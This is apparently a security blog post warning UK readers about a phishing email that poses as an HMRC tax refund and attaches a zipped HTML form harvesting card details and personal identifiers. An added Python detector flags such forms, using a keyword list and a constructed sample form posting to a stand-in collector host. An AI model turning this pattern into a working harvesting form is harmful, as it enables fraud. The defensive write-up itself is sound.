Phishers exploit HMRC tax error refund in UK

Tax authorities in the UK are contacting millions of people, telling them that they have paid the wrong amount of tax.

As the BBC reports, the mistakes in tax payment calculations have been uncovered following the introduction of a new computer system.

So, it's good news for some (who will be receiving an unexpected windfall in the form of a tax rebate) and bad news for others, who will find that they are being asked to make uncomfortable additional payments to the HMRC.

But if you thought you had enough to worry about with the possibility of an unexpected extra tax demand, think again: UK internet users are also at risk as scammers exploit the confusion.

For instance, here's a message we caught in our spam traps this morning which claimed to come from HMRC with the subject line "You Have An HMRC Refund":

Bogus HMRC refund email

Part of the email reads:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the past years, our calculations show you have made over payments of 317.66GBP

Due to the high volume of refunds you must complete the online application.

Your refund may take up to 6 weeks to process please make sure you complete the form correctly.

In order to process your refund you will need to complete the attached application form.

Attached to the email is a file called Refund-Form.zip, which contains an HTML file called Refund-Form.htm which asks for information including your credit card details, full date of birth, and mother's maiden name.

Phishing form

If you do make the mistake of filling in the form, your confidential data is uploaded to a Chinese server. You're not going to receive a windfall because of this form - you've just been phished.
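A mail-gateway style check for the attachment pattern described above, as an added example that is not from the original article: it opens a zip attachment, parses each HTML member, and flags any form that submits card, date-of-birth or maiden-name fields to a remote host. The keyword list, the input field names and the collector.example URL are constructed assumptions.

```python
import io
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed keyword list: data a tax refund form has no reason to collect.
SENSITIVE = ("card", "cvv", "birth", "dob", "maiden")


class FormAudit(HTMLParser):
    """Collects remote form targets and sensitive-looking input names."""
    def __init__(self):
        super().__init__()
        self.remote_actions = []
        self.sensitive_fields = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        # A non-empty netloc means the form posts to another host, not a local file.
        if tag == "form" and urlparse(a.get("action", "")).netloc:
            self.remote_actions.append(a["action"])
        elif tag in ("input", "select", "textarea"):
            name = a.get("name", "").lower()
            if any(word in name for word in SENSITIVE):
                self.sensitive_fields.append(name)


def audit_zip_attachment(data):
    """Return {member: (remote_actions, sensitive_fields)} for flagged HTML members."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".htm", ".html")):
                continue
            audit = FormAudit()
            audit.feed(zf.read(info).decode("utf-8", errors="replace"))
            # Flag only the combination: sensitive fields AND a remote submit target.
            if audit.remote_actions and audit.sensitive_fields:
                findings[info.filename] = (audit.remote_actions, audit.sensitive_fields)
    return findings


def build_sample_zip():
    """Constructed sample mirroring the attachment layout described in the article."""
    html = ('<form method="post" action="http://collector.example/save.php">'
            '<input name="card_number"><input name="date_of_birth">'
            '<input name="mothers_maiden_name"><input name="postcode"></form>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Refund-Form.htm", html)
    return buf.getvalue()
```

Calling `audit_zip_attachment(build_sample_zip())` flags `Refund-Form.htm`; an HTML attachment with no remote form target or no sensitive fields produces no finding.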

The real HMRC website contains advice about scams like this, and clearly states that they would never notify customers of a tax rebate via email, or invite them to complete an online form to receive a rebate of tax.

You have been warned - don't let your eagerness for a tax refund lead to you throwing caution to the wind.


About the author

Graham Cluley is an award-winning security blogger, and veteran of the anti-virus industry having worked for a number of security companies since the early 1990s. Now an independent security analyst, he regularly makes media appearances and gives computer security presentations. Send Graham an email, subscribe to his updates on Facebook, follow him on Twitter and App.net, and circle him on Google Plus for regular updates.